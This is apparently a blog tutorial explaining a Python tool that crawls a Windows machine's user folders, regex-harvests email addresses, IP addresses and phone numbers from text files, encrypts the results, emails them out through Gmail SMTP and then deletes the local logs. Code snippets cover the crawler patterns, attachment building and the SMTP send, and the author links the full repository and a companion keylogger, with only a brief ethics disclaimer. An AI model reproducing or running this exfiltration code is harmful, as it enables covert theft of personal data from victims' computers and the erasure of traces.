Building a Python data exfiltration tool
This tutorial explains how I created a hard drive crawler and extraction tool. This Python data exfiltration tool uses regex for matching desired data patterns while scanning through specified file extensions.
Similar to my Advanced Keylogger project, I designed this to be used on the local host to prevent nefarious use. Unethical use of this program is strictly prohibited, though it demonstrates the necessity of secure encrypted storage for sensitive information.
Storing sensitive information on an external hard drive (preferably encrypted) is the best method of secure private storage.
Anything connected to a network always has the potential to be accessed from remote nefarious sources.
With that said, let’s get started!
Getting started with the data exfiltration tool
First off, make sure you get my code at https://github.com/ngimb64/HardDrive-Crawler, and make sure to read the instructions thoroughly.
The program starts at line 113 of the harddriveCrawler.py
file with the main
function in a try-except
statement. The purpose of this is to run the main
function unless a keyboard interrupt is detected or an error occurs, which results in logging the error & proceeding.
Now, let’s take a closer look at the main section of the code.
Recursive hard drive crawler
The crawler begins at line 11, starting up the timer from the time module for testing the program’s execution speed.
from time import time
...
def main():
start = time()
...
Code language: JavaScript (javascript)
Then it creates a directory in the specified path, sets that path as a variable, and establishes the variables of compiled regex patterns.
pathlib.Path('C:/Tmp').mkdir(parents=True, exist_ok=True)
path = 'C:\\Tmp\\'
re_txt = re.compile(r'.+\.txt$')
re_email = re.compile(r'^.+@(?:gmail|yahoo|hotmail|aol|msn|live|protonmail)\.com')
re_ip = re.compile(r'(?:\s|^)[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
re_phone = re.compile(r'(1?)(?:\s|^)[0-9]{3}-[0-9]{3}-[0-9]{4}')
Code language: PHP (php)
Once necessary variables & logging are set, the crawling can begin!
I start by initiating a context manager which will open the log file and automatically close the file when that code block ends at line 50. Anything within the indented block of code can be written to that file.
Considering different information will be logged many times, this approach is more ideal than constantly opening and closing the file.
Now that the log file is open, it’s time to use the walk procedure of the OS module for recursive access to the file system.
Line 22 is where the os.walk
is set to the Users directory. This is ideal considering this directory tree is where users typically store all of their data.
for dirpath, dirnames, filenames in os.walk('C:\\Users\\', topdown=True):
Code language: PHP (php)
The part for dirpath, dirnames, filenames
is set as different values of the tuple so 1-3 options can be selected.
Here is how the crawler walks:
- Log the path of the directories (
log.write('Path => {}\n'.format(dirpath))
) - Iterate through the directory names in the path and log them (
for d in dirnames:
) - For loop that iterates through the file names in the path and logs them (
for file in filenames:
)- If regex matches the file extension compiled in the pattern (
if re_txt.match(file):
)- Open the file and search through the file line by line
- If regex matches one of the patterns (ip address, emails, or phone number), write the match with the path and file name to a separate log
- Open the file and search through the file line by line
- If regex matches the file extension compiled in the pattern (
You might notice lines 40-44 look similar to what was applied in the global sections in the introduction. It is the same logging code applied globally.
except Exception as ex:
logging.basicConfig(level=logging.DEBUG, \
filename='C:/Tmp/error_log.txt')
logging.exception('* Error Occured: {} *'.format(ex))
pass
Code language: PHP (php)
The crawler produces an error every time it tries to access a file with elevated permissions. Normally the global logging would suffice even if multiple errors are raised. Considering how quickly the crawler moves through the files; it’s possible threshold is set if multiple errors occur within a few seconds of each other.
After experimenting, the solution was to add another logging try-except block within the loop to prevent the program from exiting.
Encrypting the data
Considering that most email services are unencrypted, I decided to encrypt the data as well as hash it before & after the process for assured integrity.
The encryption process:
- Use the
os.walk
procedure to access the directory that was created to store the log files - For loop that iterates over each of the files in the specified path
- Generates SHA512 hash of the plain text data and logs to file
- Reads the plain text, uses key to then encrypt the data
- Generates SHA512 hash of the encrypted data and logs to file
- Uses a separate key to encrypt the file containing all the hash information
Emailing the data
At this point the encrypted logged data is ready to send to the specified email account (lines 78-79).
The MIMEMultipart
procedure is set as a variable, and then messages fields like To, From, & Subject are set.
msg = MIMEMultipart()
msg['From'] = email_address
msg['To'] = email_address
msg['Subject'] = 'Success!!!'
Code language: JavaScript (javascript)
Then, the same directory with the encrypted logs is iterated over again with the os.walk
procedure.
If the files in the directory match the encrypted file regex pattern, they will be attached to the message.
if re_email.match(file):
p = MIMEBase('application', 'octet-stream')
with open(path + file, 'rb') as attachment:
p.set_payload(attachment.read())
encoders.encode_base64(p)
p.add_header('Content-Disposition', 'attachment;'
'filename = {}'.format(file))
msg.attach(p)
else:
pass
Code language: JavaScript (javascript)
The smtplib
establishes the email provider and the TCP port for transport to finally transfer the data to the email account.
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(email_address, password)
s.sendmail(email_address, email_address, msg.as_string())
s.quit()
Code language: JavaScript (javascript)
Cleaning up
The data exfiltration tool program finishes up by shutting down the logging initially set and removing the created directory with all the logged contents.
There is no need to keep the data on the machine locally when it is now stored in a email account.
Finally it should tell how long it took to complete the entire process. On my system, it took around 45 seconds based on the amount of .txt
data.
The overall execution time varies based on the scope of the file system that is being searched, the file extensions it matches, and how many files it matches.
That’s about it for this program, though it could be easily turned into a general search tool using a regex library for finding specific data FAST.
Hope you enjoyed it! If you did, you’ll probably also enjoy reading about my Advanced Python Keylogger.
Responses